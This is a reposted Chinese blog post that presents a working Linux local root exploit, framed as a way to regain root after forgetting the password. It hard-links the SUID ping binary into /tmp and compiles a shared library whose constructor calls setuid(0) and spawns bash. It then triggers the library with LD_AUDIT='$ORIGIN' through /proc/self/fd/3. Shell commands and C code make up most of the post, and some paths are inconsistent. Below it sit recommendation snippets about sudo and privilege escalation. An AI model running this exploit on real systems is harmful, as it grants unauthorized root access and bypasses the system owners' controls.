提权学习:Linux普通用户提权为root

最新推荐文章于 2025-07-24 16:51:24 发布
转载 最新推荐文章于 2025-07-24 16:51:24 发布 · 1.5k 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:https://blog.youkuaiyun.com/God_XiangYu/article/details/99882464

本文分享了一种在不重启系统的情况下,将Linux普通用户权限提升至root的实用技巧。通过利用ping命令的suid特性创建链接,并结合C程序与gcc编译器,实现了无需密码的root权限获取。

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

目录

Linux普通用户提权为root

接下来直接看实例

 

Linux普通用户提权为root

      我记得我以前用Linux的时候,忘记root密码是常有的事情,很多时候大家都会选择重启系统,进入单用户模式重置root密码,但在实际运维工作中,就未必能任性重启了。

      分享一个不必重启也能切换至root用户的方法给大家。

接下来直接看实例

1. 查看系统环境

cat  /etc/centos-release

2. 创建普通用户进行权限测试


 
  1. 
   
    
    
    
   
    
   
    
    
    
     useradd ce
    
    
   
  2. 
   
    
    
    
   
    
   
    
    
    
     su ce
    
    
   
  3. 
   
    
    
    
   
    
   
    
    
    
     cat  /etc/shadow

3. 开始提权操作

利用ping命令的suid特性,创建一个链接。(ln  /bin/ping   /tmp/cetest/target)


 
  1. 
   
    
    
    
   
    
   
    
    
    
     ll  /tmp/   -d
    
    
   
  2. 
   
    
    
    
   
    
   
    
    
    
     cd  /tmp/
    
    
   
  3. 
   
    
    
    
   
    
   
    
    
    
     mkdir  cetest                     //创建目录
    
    
   
  4. 
   
    
    
    
   
    
   
    
    
    
     ll  /bin/ping                         
    
    
   
  5. 
   
    
    
    
   
    
   
    
    
    
     ln  /bin/ping   /tmp/cetest/target   //利用ping命令的suid特性,创建一个链接
    
    
   
  6. 
   
    
    
    
   
    
   
    
    
    
     ll   /tmp/
     test/target
    
    
   
  7. 
   
    
    
    
   
    
   
    
    
    
     exec  3<  /tmp/cetest/target      //调用命令
    
    
   
  8. 
   
    
    
    
   
    
   
    
    
    
     rm  -rf  /tmp/retest

4. 创建一个C程序

创建vim test.c  


 
  1. 
   
    
    
    
   
    
   
    
    
    
     void __attribute__((constructor)) init()  
    
    
   
  2. 
   
    
    
    
   
    
   
    
    
    
     {  
    
    
   
  3. 
   
    
    
    
   
    
   
    
    
    
        setuid(
     0);  
    
    
   
  4. 
   
    
    
    
   
    
   
    
    
    
        system(
     "/bin/bash");  
    
    
   
  5. 
   
    
    
    
   
    
   
    
    
    
     }

5. 编译C程序


 
  1. 
   
    
    
    
   
    
   
    
    
    
     gcc -w -fPIC -shared -o /tmp/root test.c  
    
    
   
  2. 
   
    
    
    
   
    
   
    
    
    
     LD_AUDIT=
     "\$ORIGIN" 
     exec /proc/self/fd/3

注:执行程序后,会出现一个报错,但不用管,此时应该顺利切换至root用户了。

 

我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重

 

Ansible最佳实践之Playbook不同上下文Demo
山河已无恙
06-24 581
对于初学ansible的小伙伴来将,配置大都是通过配置的方式来,通过配置的文件的方式配置的,对所有执行的剧本角色有,这样的好处是,简单方便,但是有一定的风险,任何命令都通用过来执行,即任何进程都是,对于黑客来讲,最想得到的即root限,如果进程被植入了木马病毒之类,控制了进程即拥有roo...
linux 普通用户root.docx
06-04
渗透中如何将Linux普通用户root,首先创建一个普通用户,并且给普通用户设置一个密码,保证能用su 命令能用普通用户
Linux——SUDO
negnegil的博客
09-03 1万+
使用SudoLinux账户限 在Linux/Unix中,/etc/sudoers文件是sudo限的配置文件,其中储存了一些用户或组可以以root限使用的命令。如下图 Sudoer文件语法 假如我们(root用户)要给普通用户test分配sudo限,请输出vim /etc/sudoers打开文件进行编辑,找到rootroot ALL=(ALL:ALL) ALL,在下一行输入 test ALL(ALL:ALL) ALL,保存后退出,这样即表示用户test可以使用sudo调用root
Linux曝出Sudo漏洞 任意用户亦可运行root命令
09-14
近期曝出的一个漏洞,却直指 sudo 的一个安全策略隐患 —— 即便配置中明确不允许 root 用户访问,该漏洞仍可允许恶意用户或程序,在目标 Linux 系统上以 root 用户身份执行任意命令
linux普通用户
qq_37532151的博客
08-16 9986
本文转自:https://blog.youkuaiyun.com/wanghaihao_1/article/details/80013440 鉴于本人小小虫师一枚,因业务需要,要在服务器上跑爬虫,然而我家万恶的java后台只给了我个普通限,python中好多需要import的库并不能成功pip install,所以一时兴起,百度了一下怎么在linux下给普通用户。备注:我家服务器/etc/su...
linux 普通用户root
vippomelo的博客
09-28 1120
Linux之SUID 本篇文章非原创,用作笔记方便后期查询,原创作者微信公众号“黑白之道”如有侵,联系删除 什么是suid? 通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的限。 常见的可用于suid的命令 Vim find Bash More Less cp chmod ash/linux shell awk mv man python perl tcpdump 查找suid文件 1 2 ...
linux禁止普通用户切换至root用户的实例讲解
09-15
本文将详细介绍如何在Linux中禁止普通用户切换至root用户,通过控制限访问模块(PAM)和登录定义文件来实现这一目标。 首先,让我们回顾一下Linux中的用户和用户组管理命令: 1. **添加用户**:使用`useradd`...
普通用户如何使用sudoroot
03-14
</think>### 普通用户通过 `sudo` 至 `root` 的配置方法 #### 1. **修改 `/etc/sudoers` 配置文件** - **使用 `visudo` 命令**:该命令会安全地打开并编辑 `/etc/sudoers` 文件,避免语法错误导致限问题[^1]...
Linux sudo 与 su 全解析:切换用户、操作及 sudoers 配置实战指南
最新发布
专注于云计算
07-24 324
本文介绍了Linux系统中两种常用的工具su和sudo的使用方法及区别。su命令允许用户切换身份,分为登录shell和非登录shell两种模式,前者会完全切换环境变量。sudo则供更精细的限控制,允许特定用户以其他身份执行特定命令,且无需知道目标用户密码。文章详细演示了su命令的环境变量差异、sudo配置文件编辑方法,并通过多个示例说明如何配置sudo限,包括免密码执行、限制可执行命令等场景。建议管理员优先使用登录shell模式的su命令,并为sudo配置最小限原则。
Linux与数据库
赤赤三的博客
03-20 802
Linux系统内核漏洞:(常见的就是系统内核 | 脏牛 | suid) 原理: linux内核版本的分类 Linux内核版本有两种:稳定版和开发版 ,Linux内核版本号由3组数字组成:第一个组数字.第二组数字.第三组数字 第一个组数字:目前发布的内核主版本。 第二个组数字:偶数表示稳定版本;奇数表示开发中版本。 第三个组数字:错误修补的次数。 思路(利用linux系统漏洞进行,首先搜索linux系统漏洞,然后去github搜索Debian 5对应
Linux普通用户
Tianzhenchuan的博客
03-31 1628
Linux环境下,给普通用户的方式,su与sudo命令,su是将一个普通用户登录为root,而sudo则是将普通用户短暂普通用户使用$root使用#
Linux普通用户(sudo)
Xpccccc的博客
11-01 2411
Linux普通用户(sudo)
一个linux用的技巧
魔拉宝
09-16 497
 一个linux用的技巧,放出来攒RP了。OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本一个test:[xiaoyu@localdomain ~]$ echo $BASH_ENV[xiaoyu@localdomain ~]$ export BASH_ENV="/tmp/.bashrc"[x
Linux——手把手教你解决sudo指令无法使用的问题
热门推荐
Forward♞的博客
11-10 1万+
sudorootroot但是,如果是新创建的普通账户,一般来说一开始是不能执行sudosudoerssudosuduersrootsudosudoerssudorootsudoersroot
Linux下,给普通用户的方法,su与sudo命令,sudo需要前在sudoers文件中配置
ganfanren00001的博客
01-02 1万+
Linux下,给普通用户的方法,su与sudo命令 一、需要的场景: 1、普通用户没有足够的访问限 2、root限太强应该少用 3、普通用户不得不执行特殊指令时需要 su,永久,不退出就可以一直用的命令: su //switching user交换用户 注意: 用户用$表示,root用#表示 普通用户使用命令 su root 使用root限登陆,密文输入超管密码后,用户就会变成超管root登陆。 用完退出超管root su username 也可以使用户切换到其他用户,不一定只
Linux普通用户
Zhangzd3154的博客
08-23 482
给operation账号 vim /etc/sudoers 在文档最后添加如下语句: User_Alias USERALIAS=operation USERALIAS ALL=(ALL) NOPASSWD: ALL,CMDALIAS Cmnd_Alias CMDALIAS=!/usr/bin/vi sudoer,!/usr/bin/vi sudoer,!/usr/sbin/visudo,!/usr/bin/vim sudoer,!/usr/bin/passwd root,!/bin/rm -rf /,
Linux普通用户
m0_45318174的博客
05-15 1462
普通用户 1.切换用户的方式: 切换用户格式: su - 用户名 注:root→任意用户,不验证密码 普通用户→其他用户,验证目标用户的密码 限制使用su命令的用户: PAM安全认证(可插拔式认证模块):vi /etc/pam.d/su 2.修改配置文件 (1)别名规则的定义格式: AliasType NAME = item1, item2, … 或者 AliasType NAME = item1, item2, item3 : NAME = item4, item5 其中: AliasType是
Linux中如何给普通用户
狂小伍的博客
01-26 2170
Linux中给普通用户
linux普通用户的sudo
toutuopang的博客
04-11 2868
sudo 企业中不允许员工使用shell的root账户登录,每个人有自己的普通账号,通过sudo获得root示:公司中先登录堡垒机再登录服务器 sudo过程 申请到普通账号后,根据规定让拥有root限的同事添加用户 useradd+用户名:添加一个普通账号 id用户名: 查看账号是否添加成功 vim /etc/sudoers 在最后一行加入 ...
Linux攻略:8大类型,30种方法解析
"这篇文档是关于Linux的综合总结,涵盖了8大类型的方法,包括内核、服务、sudo、suid、sgid、定时任务、nfs等,适合初学者理解。文档中还供了具体的实践操作示例,如自定义可...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值